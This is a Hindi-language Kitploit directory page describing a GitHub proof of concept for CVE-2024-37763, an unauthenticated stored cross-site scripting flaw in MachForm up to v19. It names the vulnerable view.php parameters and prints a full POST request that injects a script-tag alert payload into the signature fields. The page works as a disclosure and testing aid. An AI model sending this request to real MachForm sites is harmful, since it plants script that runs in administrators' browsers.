Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/atreb92/cve-2024-37763
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubatreb92/cve-2024-37763

cve-2024-37763

CVE-2024-37763 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, MachForm में v19 तक एक अनधिकृत संग्रहीत XSS, view.php में संवेदनशील मापदंडों के माध्यम से पेलोड इंजेक्शन का प्रदर्शन।

रिपॉजिटरी देखें
112 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

विवरण

MachForm संस्करण 19 तक एक अप्रमाणित संग्रहीत क्रॉस-साइट स्क्रिप्टिंग से प्रभावित है जो मान्य सत्र वाले उपयोगकर्ताओं को प्रभावित करता है जो संकलित फॉर्म परिणाम देख सकते हैं।

लक्ष्य वेब एप्लिकेशन में, जब पाठ हस्ताक्षर सक्षम के साथ एक फॉर्म का उपयोग किया जाता है, तो कमजोर संसाधन के लिए किए गए अनुरोध में XSS हमले का सामना करना पाया गया है। कमजोर URL के अंदर बॉडी के POST अनुरोध का एक पैरामीटर सैनिटाइजेशन की कमी रखता है, यह दुर्भावनापूर्ण पेलोड को रखने और पीड़ित के ब्राउज़र पर जावास्क्रिप्ट कोड को ट्रिगर करने की अनुमति देता है।

जोखिम

  • गंभीरता: मध्यम
  • CVSS v3.1 स्कोर: 5.4
  • CVSS v3.1 वेक्टर: AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L

प्रभावित संसाधन

  • संस्करण: MachForm v19 तक
  • https://<application-baseurl>/view.php

कमजोर पैरामीटर इस आधार पर गतिशील होते हैं कि फॉर्म में टेक्स्ट सिग्नेचर घटक कहाँ रखा गया है:

  • element_{element_number}_text_signature
  • element_{element_number}

साक्ष्य

कमजोर पैरामीटर में जावास्क्रिप्ट पेलोड इंजेक्ट करना संभव है।

image_1

अनुरोध:

root@kitploit:~
POST /view.php HTTP/1.1
Host: application-baseurl
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://application-baseurl/
Content-Type: multipart/form-data; boundary=---------------------------6026266881719614557329755478
Content-Length: 1141
Origin: https://application-baseurl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_1"

test5
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_4_text_signature"

"><script>alert(1)</script>
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_4"

"><script>alert(1)</script>
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_12"; filename=""
Content-Type: application/octet-stream

-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="element_12_token"

3cc3be6c0c28b67f1c55eb23786b2869
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="form_id"

59032
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="submit_form"

1
-----------------------------6026266881719614557329755478
Content-Disposition: form-data; name="page_number"

1
-----------------------------6026266881719614557329755478--

फिर पेलोड तब ट्रिगर होता है जब कोई प्रमाणित उपयोगकर्ता फॉर्म परिणाम प्रविष्टि को संपादित करता है।

image_2

image_3

टूल डाउनलोड करें